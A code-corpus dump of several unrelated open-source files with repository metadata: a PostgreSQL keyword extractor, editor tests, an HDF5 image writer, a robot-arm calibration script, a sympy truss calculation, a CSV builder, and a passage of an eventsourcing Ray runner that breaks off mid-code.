bitdotioinc/pglast
|
da4c0b1c237aad98894179af9cd29e044d526ba8
|
[
"PostgreSQL"
] | null | null | null |
# -*- coding: utf-8 -*-
# :Project: pglast -- Extract keywords from PostgreSQL header
# :Created: dom 06 ago 2017 23:34:53 CEST
# :Author: Lele Gaifax <lele@metapensiero.it>
# :License: GNU General Public License version 3 or later
# :Copyright: © 2017, 2018 Lele Gaifax
#
from collections import defaultdict
from os.path import basename
from pprint import pformat
from re import match
import subprocess
HEADER = """\
# -*- coding: utf-8 -*-
# :Project: pglast -- DO NOT EDIT: automatically extracted from %s @ %s
# :Author: Lele Gaifax <lele@metapensiero.it>
# :License: GNU General Public License version 3 or later
# :Copyright: © 2017 Lele Gaifax
#
"""
def get_libpg_query_version():
result = subprocess.check_output(['git', 'describe', '--all', '--long'],
cwd='libpg_query')
return result.decode('utf-8').strip().split('/')[-1]
def extract_keywords(source):
for line in source.splitlines():
if line.startswith('PG_KEYWORD'):
m = match(r'PG_KEYWORD\("([^"]+)",[^,]+,\s*([\w_]+)\)', line.strip())
if m:
yield m.group(1), m.group(2)
def workhorse(args):
with open(args.header, encoding='utf-8') as f:
source = f.read()
bytype = defaultdict(set)
for keyword, type in extract_keywords(source):
bytype[type].add(keyword)
with open(args.output, 'w', encoding='utf-8') as output:
output.write(HEADER % (basename(args.header), get_libpg_query_version()))
for type in sorted(bytype):
output.write('\n')
output.write(type + 'S')
output.write(' = {')
keywords = pformat(bytype[type], compact=True, indent=len(type)+5, width=95)
output.write(keywords[1:].lstrip())
output.write('\n')
def main():
from argparse import ArgumentParser, ArgumentDefaultsHelpFormatter
parser = ArgumentParser(description="PG keyword extractor",
formatter_class=ArgumentDefaultsHelpFormatter)
parser.add_argument('header',
help="source header to be processed")
parser.add_argument('output',
help="Python source to be created")
args = parser.parse_args()
workhorse(args)
if __name__ == '__main__':
main()
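# For reference, a sketch of what extract_keywords() yields on one header line
# (the sample mirrors the three-argument PG_KEYWORD format of older kwlist.h files):
#
#   >>> list(extract_keywords('PG_KEYWORD("abort", ABORT_P, UNRESERVED_KEYWORD)'))
#   [('abort', 'UNRESERVED_KEYWORD')]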
| 30.246753
| 88
| 0.613568
| 0
| 0
| 253
| 0.108537
| 0
| 0
| 0
| 0
| 778
| 0.333762
|
fbfc768e9b9032e8d1b05f89ef3578bc75d58172
| 1,913
|
py
|
Python
|
tests/vi/test_indent_text_object.py
|
trishume/VintageousPlus
|
1dd62435138234979fe5bb413e1731119b017daf
|
[
"MIT"
] | 6
|
2017-04-01T05:30:08.000Z
|
2017-04-05T14:17:40.000Z
|
tests/vi/test_indent_text_object.py
|
trishume/VintageousPlus
|
1dd62435138234979fe5bb413e1731119b017daf
|
[
"MIT"
] | 1
|
2017-04-04T06:47:13.000Z
|
2017-04-04T14:26:32.000Z
|
tests/vi/test_indent_text_object.py
|
trishume/VintageousPlus
|
1dd62435138234979fe5bb413e1731119b017daf
|
[
"MIT"
] | null | null | null |
from collections import namedtuple
from sublime import Region as R
from VintageousPlus.tests import set_text
from VintageousPlus.tests import add_sel
from VintageousPlus.tests import ViewTest
from VintageousPlus.vi.text_objects import find_indent_text_object
test = namedtuple('simple_test', 'content start expected expected_inclusive msg')
# cursor is at "|"
TESTS_INDENT = (
test(start=R(37, 37), expected=R(29, 62), expected_inclusive=R(29, 62), msg='should find indent', content='''
# a comment
def a_ruby_block
some_c|all
another_one
yerp
end'''.lstrip()),
test(start=R(37, 37), expected=R(29, 41), expected_inclusive=R(29, 80), msg='should find indent when there\'s a blank line', content='''
# a comment
def a_ruby_block
some_c|all
another_one_with(blank_line)
yerp
end'''.lstrip()),
    test(start=R(42, 42), expected=R(34, 57), expected_inclusive=R(34, 58), msg='should work with python-ey functions', content='''
# a python thing
def a_python_fn:
some_c|all()
what()
a_python_fn'''.lstrip()),
test(start=R(57, 57), expected=R(57, 57), expected_inclusive=R(57, 57), msg='should ignore when triggered on a whitespace-only line', content='''
# a python thing
def a_python_fn:
some_call()
what()
a_python_fn'''.lstrip()),
)
class Test_indent(ViewTest):
def clear_selected_regions(self):
self.view.sel().clear()
def testAll(self):
for (i, data) in enumerate(TESTS_INDENT):
self.clear_selected_regions()
self.write(data.content)
for inclusive in [True, False]:
start, end = find_indent_text_object(self.view, data.start, inclusive)
actual = R(start, end)
msg = "failed at test index {0}: {1}".format(i, data.msg)
expected = data.expected_inclusive if inclusive else data.expected
self.assertEqual(expected, actual, msg)
| 28.552239
| 149
| 0.681652
| 636
| 0.332462
| 0
| 0
| 0
| 0
| 0
| 0
| 587
| 0.306848
|
fbfd008303bf64141666afab184cb7b1413f62e6
| 1,417
|
py
|
Python
|
example_write_camera_frames_to_hdf5.py
|
mihsamusev/pytrl_demo
|
411a74cb5f3601f03438f608b4cf8e451a88345e
|
[
"MIT"
] | null | null | null |
example_write_camera_frames_to_hdf5.py
|
mihsamusev/pytrl_demo
|
411a74cb5f3601f03438f608b4cf8e451a88345e
|
[
"MIT"
] | null | null | null |
example_write_camera_frames_to_hdf5.py
|
mihsamusev/pytrl_demo
|
411a74cb5f3601f03438f608b4cf8e451a88345e
|
[
"MIT"
] | null | null | null |
import cv2
from imutils.paths import list_images
import imutils
import re
import datetime
from datasets.hdf5datasetwriter import HDF5DatasetWriter
import progressbar
def get_frame_number(impath):
return int(re.search(r"image data (\d+)", impath).group(1))
def get_timestamp(impath):
"assuming that the timestamp is a part of the image name"
date_str = impath.split(".")[0]
date_str = re.split(r"image data \d+ ", date_str)[1]
date = datetime.datetime.strptime(date_str, '%Y-%b-%d %H %M %S %f')
return date
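# Example of both helpers on one illustrative filename (not a real capture):
#   impath = "image data 42 2019-Oct-12 13 37 05 123456.jpg"
#   get_frame_number(impath) -> 42
#   get_timestamp(impath)    -> datetime.datetime(2019, 10, 12, 13, 37, 5, 123456)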
# Load the data, sort by frame number
basePath = "D:/create lidar trafik data/newer data/ImageData/"
impaths = list(list_images(basePath))
impaths = sorted(impaths, key=get_frame_number)
print("[INFO] building HDF5 dataset...")
outputPath = basePath + "frames.hdf5"
writer = HDF5DatasetWriter((len(impaths), 360, 640, 3), outputPath)
# initialize the progress bar
widgets = ["Building Dataset: ", progressbar.Percentage(), " ",
progressbar.Bar(), " ", progressbar.ETA()]
pbar = progressbar.ProgressBar(maxval=len(impaths),
widgets=widgets).start()
for i, impath in enumerate(impaths):
date = get_timestamp(impath)
ts = (date - datetime.datetime(1970, 1, 1)) / datetime.timedelta(seconds=1)
image = cv2.imread(impath)
image = imutils.resize(image, width=640)
writer.add([image], [ts])
pbar.update(i)
# close the HDF5 writer
pbar.finish()
writer.close()
| 31.488889
| 79
| 0.715596
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 331
| 0.233592
|
fbfd2e30f614a3b655c2662e8c6213275af8c2ac
| 4,378
|
py
|
Python
|
touch.py
|
mendelmaker/dipn
|
a4871ecf2e4eeb40ff3b7945150c255802694609
|
[
"BSD-2-Clause"
] | 8
|
2020-11-17T16:55:34.000Z
|
2021-04-28T09:24:37.000Z
|
touch.py
|
mendelmaker/dipn
|
a4871ecf2e4eeb40ff3b7945150c255802694609
|
[
"BSD-2-Clause"
] | null | null | null |
touch.py
|
mendelmaker/dipn
|
a4871ecf2e4eeb40ff3b7945150c255802694609
|
[
"BSD-2-Clause"
] | 8
|
2021-07-05T05:10:17.000Z
|
2022-03-02T12:10:25.000Z
|
#!/usr/bin/env python
import matplotlib.pyplot as plt
import numpy as np
import time
import cv2
from real.camera import Camera
from robot import Robot
from subprocess import Popen, PIPE
def get_camera_to_robot_transformation(camera):
color_img, depth_img = camera.get_data()
cv2.imwrite("real/temp.jpg", color_img)
p = Popen(['./real/detect-from-file', "real/temp.jpg"], stdin=PIPE, stdout=PIPE, stderr=PIPE)
output, err = p.communicate()
tag_info = output.decode("utf-8")
tag_info = tag_info.split("\n")[:4]
for i, info in enumerate(tag_info):
tag_info[i] = info.split(" ")
print(tag_info)
tag_info = np.array(tag_info, dtype=np.float32)
assert(tag_info.shape == (4, 3))
tag_loc_camera = tag_info
tag_loc_robot = {
22: (270.15 / 1000, -637.0 / 1000),
7: (255.35 / 1000, -247.6 / 1000),
4: (-272.7 / 1000, -660.9 / 1000),
2: (-289.8 / 1000, -274.2 / 1000)
}
camera_to_robot = cv2.getPerspectiveTransform(
np.float32([tag[1:] for tag in tag_loc_camera]),
np.float32([tag_loc_robot[tag[0]] for tag in tag_loc_camera]))
return camera_to_robot
# User options (change me)
# --------------- Setup options ---------------
tcp_host_ip = '100.127.7.223' # IP and port to robot arm as TCP client (UR5)
tcp_host_ip = "172.19.97.157"
tcp_port = 30002
rtc_host_ip = '100.127.7.223' # IP and port to robot arm as real-time client (UR5)
rtc_host_ip = "172.19.97.157"
rtc_port = 30003
# Cols: min max, Rows: x y z (define workspace limits in robot coordinates)
workspace_limits = np.asarray([[0.3, 0.748], [-0.224, 0.224], [-0.255, -0.1]])
workspace_limits = np.asarray([[-0.237, 0.211], [-0.683, -0.235], [0.18, 0.4]])
# workspace_limits = np.asarray([[-0.224, 0.224], [-0.674, -0.226], [0.18, 0.4]])
# Cols: min max, Rows: x y z (define workspace limits in robot coordinates)
tool_orientation = [2.22, -2.22, 0]
tool_orientation = [0, -3.14, 0]
# ---------------------------------------------
# Move robot to home pose
robot = Robot(False, None, None, workspace_limits,
tcp_host_ip, tcp_port, rtc_host_ip, rtc_port,
False, None, None)
robot.open_gripper()
transformation_matrix = get_camera_to_robot_transformation(robot.camera)
# Slow down robot
robot.joint_acc = 1.4
robot.joint_vel = 1.05
# Callback function for clicking on OpenCV window
click_point_pix = ()
camera_color_img, camera_depth_img = robot.get_camera_data()
def mouseclick_callback(event, x, y, flags, param):
if event == cv2.EVENT_LBUTTONDOWN:
        global robot, click_point_pix
click_point_pix = (x, y)
# Get click point in camera coordinates
# click_z = camera_depth_img[y][x] * robot.cam_depth_scale
# click_x = np.multiply(x-robot.cam_intrinsics[0][2],click_z/robot.cam_intrinsics[0][0])
# click_y = np.multiply(y-robot.cam_intrinsics[1][2],click_z/robot.cam_intrinsics[1][1])
# if click_z == 0:
# return
# click_point = np.asarray([click_x,click_y,click_z])
# click_point.shape = (3,1)
# # Convert camera to robot coordinates
# # camera2robot = np.linalg.inv(robot.cam_pose)
# camera2robot = robot.cam_pose
# target_position = np.dot(camera2robot[0:3,0:3],click_point) + camera2robot[0:3,3:]
# target_position = target_position[0:3,0]
# print(target_position)
camera_pt = np.array([x, y, 1])
robot_pt = np.dot(transformation_matrix, camera_pt)
robot_pt = np.array([robot_pt[0], robot_pt[1]]) / robot_pt[2]
print([robot_pt[0], robot_pt[1], -0.1])
print(robot.parse_tcp_state_data(robot.get_state(), "cartesian_info"))
robot.move_to([robot_pt[0], robot_pt[1], 0.3], tool_orientation)
# Show color and depth frames
cv2.namedWindow('color')
cv2.setMouseCallback('color', mouseclick_callback)
cv2.namedWindow('depth')
while True:
camera_color_img, camera_depth_img = robot.get_camera_data()
bgr_data = cv2.cvtColor(camera_color_img, cv2.COLOR_RGB2BGR)
if len(click_point_pix) != 0:
bgr_data = cv2.circle(bgr_data, click_point_pix, 7, (0, 0, 255), 2)
cv2.imshow('color', bgr_data)
camera_depth_img[camera_depth_img < 0.19] = 0
cv2.imshow('depth', camera_depth_img)
if cv2.waitKey(1) == ord('c'):
break
cv2.destroyAllWindows()
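
# A minimal, self-contained sketch of the pixel-to-robot mapping used above.
# The four correspondences below are made-up numbers, not a real calibration.
def _homography_demo():
    pixel_pts = np.float32([[100, 100], [500, 100], [100, 400], [500, 400]])
    robot_pts = np.float32([[-0.3, -0.7], [0.3, -0.7], [-0.3, -0.2], [0.3, -0.2]])
    H = cv2.getPerspectiveTransform(pixel_pts, robot_pts)
    # Map one clicked pixel through the homography (homogeneous divide, as in the callback).
    px = np.array([300.0, 250.0, 1.0])
    pt = H.dot(px)
    return pt[:2] / pt[2]  # robot-frame (x, y) for that pixel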
| 35.885246
| 97
| 0.653952
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,424
| 0.325263
|
fbfd539734cc022db7b79f3a3d092f8d88fe0ee4
| 3,708
|
py
|
Python
|
py/WB-Klein/5/5.4_cc.py
|
kassbohm/wb-snippets
|
f1ac5194e9f60a9260d096ba5ed1ce40b844a3fe
|
[
"MIT"
] | null | null | null |
py/WB-Klein/5/5.4_cc.py
|
kassbohm/wb-snippets
|
f1ac5194e9f60a9260d096ba5ed1ce40b844a3fe
|
[
"MIT"
] | null | null | null |
py/WB-Klein/5/5.4_cc.py
|
kassbohm/wb-snippets
|
f1ac5194e9f60a9260d096ba5ed1ce40b844a3fe
|
[
"MIT"
] | null | null | null |
# Header starts here.
from sympy.physics.units import *
from sympy import *
# Rounding:
import decimal
from decimal import Decimal as DX
from copy import deepcopy
def iso_round(obj, pv, rounding=decimal.ROUND_HALF_EVEN):
    """
    Rounding acc. to DIN EN ISO 80000-1:2013-08
    place value = Rundestellenwert (German: the place value to round to)
    """
assert pv in set([
# place value # round to:
1, # 1
0.1, # 1st digit after decimal
0.01, # 2nd
0.001, # 3rd
0.0001, # 4th
0.00001, # 5th
0.000001, # 6th
0.0000001, # 7th
0.00000001, # 8th
0.000000001, # 9th
0.0000000001, # 10th
])
objc = deepcopy(obj)
try:
tmp = DX(str(float(objc)))
objc = tmp.quantize(DX(str(pv)), rounding=rounding)
except:
for i in range(len(objc)):
tmp = DX(str(float(objc[i])))
objc[i] = tmp.quantize(DX(str(pv)), rounding=rounding)
return objc
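
# Illustrative results (ROUND_HALF_EVEN, ties go to the even digit):
#   iso_round(2.675, 0.01) -> Decimal('2.68')
#   iso_round(2.5, 1)      -> Decimal('2')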
# LaTeX:
kwargs = {}
kwargs["mat_str"] = "bmatrix"
kwargs["mat_delim"] = ""
# kwargs["symbol_names"] = {FB: "F^{\mathsf B}", }
# Units:
(k, M, G ) = ( 10**3, 10**6, 10**9 )
(mm, cm) = ( m/1000, m/100 )
Newton = kg*m/s**2
Pa = Newton/m**2
MPa = M*Pa
GPa = G*Pa
kN = k*Newton
deg = pi/180
half = S(1)/2
# Header ends here.
#
EA, l, F1, F2 = var("EA, l, F1, F2")
sub_list = [
( EA, 2 *Pa*m**2 ),
( l, 1 *m ),
( F1, 1 *Newton /2 ), # due to symmetry
( F2, 2 *Newton /2 ), # due to symmetry
]
def k(phi):
""" element stiffness matrix """
# phi is angle between:
# 1. vector along global x axis
# 2. vector along 1-2-axis of truss
# phi is counted positively about z.
# pprint("phi / deg:")
# pprint(N(deg(phi),3))
(c, s) = ( cos(phi), sin(phi) )
(cc, ss, sc) = ( c*c, s*s, s*c)
return Matrix(
[
[ cc, sc, -cc, -sc],
[ sc, ss, -sc, -ss],
[-cc, -sc, cc, sc],
[-sc, -ss, sc, ss],
])
(p1, p2, p3) = (315*pi/180, 0 *pi/180, 45 *pi/180)
# k2 uses only 1/2 A due to symmetry:
(k1, k2, k3) = (EA/l*k(p1), EA/2/l*k(p2), EA/l*k(p3))
pprint("\nk1 / (EA / l): ")
pprint(k1 / (EA/l) )
pprint("\nk2 / (EA / l): ")
pprint(k2 / (EA/l) )
pprint("\nk3 / (EA / l): ")
pprint(k3 / (EA/l) )
K = EA/l*Matrix([
[ 1 , -S(1)/2 ],
[ -S(1)/2, 1 ]
])
u2x, u3x = var("u2x, u3x")
u = Matrix([u2x , u3x ])
f = Matrix([F1 , F2 ])
u2x, u3x = var("u2x, u3x")
eq = Eq(K*u , f)
sol = solve(eq, [u2x, u3x])
pprint("\nSolution:")
pprint(sol)
u2x, u3x = sol[u2x], sol[u3x]
pprint("\nu2x / m:")
tmp = u2x.subs(sub_list)
tmp /= m
pprint(tmp)
pprint("\nu3x / m:")
tmp = u3x.subs(sub_list)
tmp /= m
pprint(tmp)
pprint("\nF1x / N:")
tmp = - EA/l * u2x/2
tmp = tmp.subs(sub_list)
tmp /= Newton
pprint(tmp)
# k1 / (EA / l):
# ⎡1/2 -1/2 -1/2 1/2 ⎤
# ⎢ ⎥
# ⎢-1/2 1/2 1/2 -1/2⎥
# ⎢ ⎥
# ⎢-1/2 1/2 1/2 -1/2⎥
# ⎢ ⎥
# ⎣1/2 -1/2 -1/2 1/2 ⎦
#
# k2 / (EA / l):
# ⎡1/2 0 -1/2 0⎤
# ⎢ ⎥
# ⎢ 0 0 0 0⎥
# ⎢ ⎥
# ⎢-1/2 0 1/2 0⎥
# ⎢ ⎥
# ⎣ 0 0 0 0⎦
#
# k3 / (EA / l):
# ⎡1/2 1/2 -1/2 -1/2⎤
# ⎢ ⎥
# ⎢1/2 1/2 -1/2 -1/2⎥
# ⎢ ⎥
# ⎢-1/2 -1/2 1/2 1/2 ⎥
# ⎢ ⎥
# ⎣-1/2 -1/2 1/2 1/2 ⎦
#
# Solution:
# ⎧ 2⋅l⋅(2⋅F₁ + F₂) 2⋅l⋅(F₁ + 2⋅F₂)⎫
# ⎨u2x: ───────────────, u3x: ───────────────⎬
# ⎩ 3⋅EA 3⋅EA ⎭
#
# u2x / m:
# 2/3
#
# u3x / m:
# 5/6
#
# F1x / N:
# -2/3
| 21.433526
| 66
| 0.432848
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,702
| 0.437757
|
fbfd7d6f8721ebc2b678a03f3cc15caf4d6fced6
| 870
|
py
|
Python
|
ucc_csv_create.py
|
MasonDMitchell/HackNC-2019
|
4656f9dcc15ee86c66885267006ed9f4f5b935e7
|
[
"MIT"
] | null | null | null |
ucc_csv_create.py
|
MasonDMitchell/HackNC-2019
|
4656f9dcc15ee86c66885267006ed9f4f5b935e7
|
[
"MIT"
] | null | null | null |
ucc_csv_create.py
|
MasonDMitchell/HackNC-2019
|
4656f9dcc15ee86c66885267006ed9f4f5b935e7
|
[
"MIT"
] | 1
|
2019-10-12T15:09:06.000Z
|
2019-10-12T15:09:06.000Z
|
#!/usr/bin/python3
import csv
ucc_dictionary_file_list = [
'./downloads/diary08/diary08/uccd08.txt',
'./downloads/diary09/diary09/uccd09.txt',
'./downloads/diary11/diary11/uccd11.txt',
'./downloads/diary10/diary10/uccd10.txt',
]
cleaned_ucc_dictionary = dict()
for dictionary in ucc_dictionary_file_list:
with open(dictionary) as file:
line_list = file.read().splitlines()
for line in line_list:
ucc_tuple = tuple(line.split(" ", 1))
cleaned_ucc_dictionary[int(ucc_tuple[0])] = ucc_tuple[1]
with open('cleaned_ucc_dictionary.csv', 'w', newline='') as csvfile:
ucc_writer = csv.writer(csvfile, delimiter=',', quoting=csv.QUOTE_MINIMAL)
for key, value in cleaned_ucc_dictionary.items():
ucc_writer.writerow([key, value])
# print(len(cleaned_ucc_dictionary.keys()))
# print(line_list)
| 33.461538
| 78
| 0.688506
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 278
| 0.31954
|
fbff8e3dec4d22f8cf3a2af319e44b94680c5703
| 30,937
|
py
|
Python
|
eventsourcing/system/ray.py
|
gerbyzation/eventsourcing
|
a9e9ecf123af658762832cf97a9f00f8f7064393
|
[
"BSD-3-Clause"
] | null | null | null |
eventsourcing/system/ray.py
|
gerbyzation/eventsourcing
|
a9e9ecf123af658762832cf97a9f00f8f7064393
|
[
"BSD-3-Clause"
] | null | null | null |
eventsourcing/system/ray.py
|
gerbyzation/eventsourcing
|
a9e9ecf123af658762832cf97a9f00f8f7064393
|
[
"BSD-3-Clause"
] | null | null | null |
import datetime
import os
import traceback
from inspect import ismethod
from queue import Empty, Queue
from threading import Event, Lock, Thread
from time import sleep
from typing import Dict, Optional, Tuple, Type
import ray
from eventsourcing.application.process import ProcessApplication
from eventsourcing.application.simple import (
ApplicationWithConcreteInfrastructure,
Prompt,
PromptToPull,
is_prompt_to_pull,
)
from eventsourcing.domain.model.decorators import retry
from eventsourcing.domain.model.events import subscribe, unsubscribe
from eventsourcing.exceptions import (
EventSourcingError,
ExceptionWrapper,
OperationalError,
ProgrammingError,
RecordConflictError,
)
from eventsourcing.infrastructure.base import (
DEFAULT_PIPELINE_ID,
RecordManagerWithNotifications,
)
from eventsourcing.system.definition import (
AbstractSystemRunner,
System,
TProcessApplication,
)
from eventsourcing.system.rayhelpers import RayDbJob, RayPrompt
from eventsourcing.system.raysettings import ray_init_kwargs
from eventsourcing.system.runner import DEFAULT_POLL_INTERVAL
ray.init(**ray_init_kwargs)
MAX_QUEUE_SIZE = 1
PAGE_SIZE = 20
MICROSLEEP = 0.000
PROMPT_WITH_NOTIFICATION_IDS = False
PROMPT_WITH_NOTIFICATION_OBJS = False
GREEDY_PULL_NOTIFICATIONS = True
class RayRunner(AbstractSystemRunner):
"""
Uses actor model framework to run a system of process applications.
"""
def __init__(
self,
system: System,
pipeline_ids=(DEFAULT_PIPELINE_ID,),
poll_interval: Optional[int] = None,
setup_tables: bool = False,
sleep_for_setup_tables: int = 0,
db_uri: Optional[str] = None,
**kwargs
):
super(RayRunner, self).__init__(system=system, **kwargs)
self.pipeline_ids = list(pipeline_ids)
self.poll_interval = poll_interval
self.setup_tables = setup_tables or system.setup_tables
self.sleep_for_setup_tables = sleep_for_setup_tables
self.db_uri = db_uri
self.ray_processes: Dict[Tuple[str, int], RayProcess] = {}
def start(self):
"""
Starts all the actors to run a system of process applications.
"""
# Check we have the infrastructure classes we need.
for process_class in self.system.process_classes.values():
            if not issubclass(process_class, ApplicationWithConcreteInfrastructure):
if not self.infrastructure_class:
raise ProgrammingError("infrastructure_class is not set")
elif not issubclass(
self.infrastructure_class, ApplicationWithConcreteInfrastructure
):
raise ProgrammingError(
"infrastructure_class is not a subclass of {}".format(
ApplicationWithConcreteInfrastructure
)
)
# Get the DB_URI.
# Todo: Support different URI for different application classes.
env_vars = {}
db_uri = self.db_uri or os.environ.get("DB_URI")
if db_uri is not None:
env_vars["DB_URI"] = db_uri
# Start processes.
for pipeline_id in self.pipeline_ids:
for process_name, process_class in self.system.process_classes.items():
ray_process_id = RayProcess.remote(
application_process_class=process_class,
infrastructure_class=self.infrastructure_class,
env_vars=env_vars,
poll_interval=self.poll_interval,
pipeline_id=pipeline_id,
setup_tables=self.setup_tables,
)
self.ray_processes[(process_name, pipeline_id)] = ray_process_id
init_ids = []
for key, ray_process in self.ray_processes.items():
process_name, pipeline_id = key
upstream_names = self.system.upstream_names[process_name]
downstream_names = self.system.downstream_names[process_name]
downstream_processes = {
name: self.ray_processes[(name, pipeline_id)]
for name in downstream_names
}
upstream_processes = {}
for upstream_name in upstream_names:
upstream_process = self.ray_processes[(upstream_name, pipeline_id)]
upstream_processes[upstream_name] = upstream_process
init_ids.append(
ray_process.init.remote(upstream_processes, downstream_processes)
)
ray.get(init_ids)
def get_ray_process(self, process_name, pipeline_id=DEFAULT_PIPELINE_ID):
assert isinstance(process_name, str)
return self.ray_processes[(process_name, pipeline_id)]
def close(self):
super(RayRunner, self).close()
for process in self.ray_processes.values():
process.stop.remote()
def get(
self, process_class: Type[TProcessApplication], pipeline_id=DEFAULT_PIPELINE_ID
) -> TProcessApplication:
assert issubclass(process_class, ProcessApplication)
process_name = process_class.create_name()
ray_process = self.get_ray_process(process_name, pipeline_id)
return ProxyApplication(ray_process)
@ray.remote
class RayProcess:
def __init__(
self,
application_process_class: Type[ProcessApplication],
infrastructure_class: Type[ApplicationWithConcreteInfrastructure],
env_vars: dict = None,
pipeline_id: int = DEFAULT_PIPELINE_ID,
poll_interval: int = None,
setup_tables: bool = False,
):
# Process application args.
self.application_process_class = application_process_class
self.infrastructure_class = infrastructure_class
self.daemon = True
self.pipeline_id = pipeline_id
self.poll_interval = poll_interval or DEFAULT_POLL_INTERVAL
self.setup_tables = setup_tables
if env_vars is not None:
os.environ.update(env_vars)
# Setup threads, queues, and threading events.
self.readers_lock = Lock()
self._has_been_prompted = Event()
self.heads_lock = Lock()
self.heads = {}
self.positions_lock = Lock()
self.positions = {}
self.positions_initialised = Event()
self.db_jobs_queue = Queue(maxsize=MAX_QUEUE_SIZE)
self.upstream_event_queue = Queue(maxsize=MAX_QUEUE_SIZE)
self.downstream_prompt_queue = Queue() # no maxsize, call() can put prompt
self.has_been_stopped = Event()
self.db_jobs_thread = Thread(target=self.db_jobs)
self.db_jobs_thread.setDaemon(True)
self.db_jobs_thread.start()
self.process_prompts_thread = Thread(target=self._process_prompts)
self.process_prompts_thread.setDaemon(True)
self.process_prompts_thread.start()
self.process_events_thread = Thread(target=self._process_events)
self.process_events_thread.setDaemon(True)
self.process_events_thread.start()
self.push_prompts_thread = Thread(target=self._push_prompts)
self.push_prompts_thread.setDaemon(True)
self.push_prompts_thread.start()
self._notification_rayids = {}
self._prompted_notifications = {}
def db_jobs(self):
# print("Running do_jobs")
while not self.has_been_stopped.is_set():
try:
item = self.db_jobs_queue.get(timeout=1)
self.db_jobs_queue.task_done()
except Empty:
if self.has_been_stopped.is_set():
break
else:
if item is None or self.has_been_stopped.is_set():
break
db_job: RayDbJob = item
# self.print_timecheck("Doing db job", item)
try:
db_job.execute()
except Exception as e:
if db_job.error is None:
print(traceback.format_exc())
self._print_timecheck(
"Continuing after error running DB job:", e
)
sleep(1)
# else:
# self.print_timecheck("Done db job", item)
@retry((OperationalError, RecordConflictError), max_attempts=100, wait=0.01)
def do_db_job(self, method, args, kwargs):
db_job = RayDbJob(method, args=args, kwargs=kwargs)
self.db_jobs_queue.put(db_job)
db_job.wait()
if db_job.error:
raise db_job.error
# self.print_timecheck("db job delay:", db_job.delay)
# self.print_timecheck("db job duration:", db_job.duration)
# self.print_timecheck('db job result:', db_job.result)
return db_job.result
def init(self, upstream_processes: dict, downstream_processes: dict) -> None:
"""
Initialise with actor handles for upstream and downstream processes.
Need to initialise after construction so that all handles exist.
"""
self.upstream_processes = upstream_processes
self.downstream_processes = downstream_processes
# Subscribe to broadcast prompts published by the process application.
subscribe(handler=self._enqueue_prompt_to_pull, predicate=is_prompt_to_pull)
# Construct process application object.
process_class = self.application_process_class
        if not issubclass(process_class, ApplicationWithConcreteInfrastructure):
if self.infrastructure_class:
process_class = process_class.mixin(self.infrastructure_class)
else:
raise ProgrammingError("infrastructure_class is not set")
class MethodWrapper(object):
def __init__(self, method):
self.method = method
def __call__(self, *args, **kwargs):
try:
return self.method(*args, **kwargs)
except EventSourcingError as e:
return ExceptionWrapper(e)
class ProcessApplicationWrapper(object):
def __init__(self, process_application):
self.process_application = process_application
def __getattr__(self, item):
attribute = getattr(self.process_application, item)
if ismethod(attribute):
return MethodWrapper(attribute)
else:
return attribute
def construct_process():
return process_class(
pipeline_id=self.pipeline_id, setup_table=self.setup_tables
)
process_application = self.do_db_job(construct_process, (), {})
assert isinstance(process_application, ProcessApplication), process_application
self.process_wrapper = ProcessApplicationWrapper(process_application)
self.process_application = process_application
for upstream_name, ray_notification_log in self.upstream_processes.items():
# Make the process follow the upstream notification log.
self.process_application.follow(upstream_name, ray_notification_log)
self._reset_positions()
self.positions_initialised.set()
def _reset_positions(self):
self.do_db_job(self.__reset_positions, (), {})
def __reset_positions(self):
with self.positions_lock:
for upstream_name in self.upstream_processes:
recorded_position = self.process_application.get_recorded_position(
upstream_name
)
self.positions[upstream_name] = recorded_position
def add_downstream_process(self, downstream_name, ray_process_id):
self.downstream_processes[downstream_name] = ray_process_id
def call(self, method_name, *args, **kwargs):
"""
Method for calling methods on process application object.
"""
assert self.positions_initialised.is_set(), "Please call .init() first"
# print("Calling", method_name, args, kwargs)
if self.process_wrapper:
method = getattr(self.process_wrapper, method_name)
return self.do_db_job(method, args, kwargs)
else:
raise Exception(
"Can't call method '%s' before process exists" % method_name
)
def prompt(self, prompt: RayPrompt) -> None:
assert isinstance(prompt, RayPrompt), "Not a RayPrompt: %s" % prompt
for notification_id, rayid in prompt.notification_ids:
# self._print_timecheck("Received ray notification ID:", notification_id, rayid)
self._notification_rayids[(prompt.process_name, notification_id)] = rayid
latest_head = prompt.head_notification_id
upstream_name = prompt.process_name
if PROMPT_WITH_NOTIFICATION_OBJS:
for notification in prompt.notifications:
self._prompted_notifications[
(upstream_name, notification["id"])
] = notification
if latest_head is not None:
with self.heads_lock:
# Update head from prompt.
if upstream_name in self.heads:
if latest_head > self.heads[upstream_name]:
self.heads[upstream_name] = latest_head
self._has_been_prompted.set()
else:
self.heads[upstream_name] = latest_head
self._has_been_prompted.set()
else:
self._has_been_prompted.set()
def _process_prompts(self) -> None:
# Loop until stop event is set.
self.positions_initialised.wait()
while not self.has_been_stopped.is_set():
try:
self.__process_prompts()
except Exception as e:
if not self.has_been_stopped.is_set():
print(traceback.format_exc())
print("Continuing after error in 'process prompts' thread:", e)
print()
sleep(1)
def __process_prompts(self):
# Wait until prompted.
self._has_been_prompted.wait()
if self.has_been_stopped.is_set():
return
# self.print_timecheck('has been prompted')
current_heads = {}
with self.heads_lock:
self._has_been_prompted.clear()
for upstream_name in self.upstream_processes.keys():
current_head = self.heads.get(upstream_name)
current_heads[upstream_name] = current_head
for upstream_name in self.upstream_processes.keys():
with self.positions_lock:
current_position = self.positions.get(upstream_name)
first_id = current_position + 1 # request the next one
current_head = current_heads[upstream_name]
if current_head is None:
last_id = None
elif current_position < current_head:
if GREEDY_PULL_NOTIFICATIONS:
last_id = first_id + PAGE_SIZE - 1
else:
last_id = min(current_head, first_id + PAGE_SIZE - 1)
else:
# self.print_timecheck(
# "Up to date with", upstream_name, current_position,
# current_head
# )
continue
# last_id = first_id + PAGE_SIZE - 1
# self.print_timecheck(
# "Getting notifications in range:",
# upstream_name,
# "%s -> %s" % (first_id, last_id),
# )
upstream_process = self.upstream_processes[upstream_name]
# Works best without prompted head as last requested,
# because there might be more notifications since.
# Todo: However, limit the number to avoid getting too many, and
# if we got full quota, then get again.
notifications = []
if PROMPT_WITH_NOTIFICATION_IDS or PROMPT_WITH_NOTIFICATION_OBJS:
if last_id is not None:
for notification_id in range(first_id, last_id + 1):
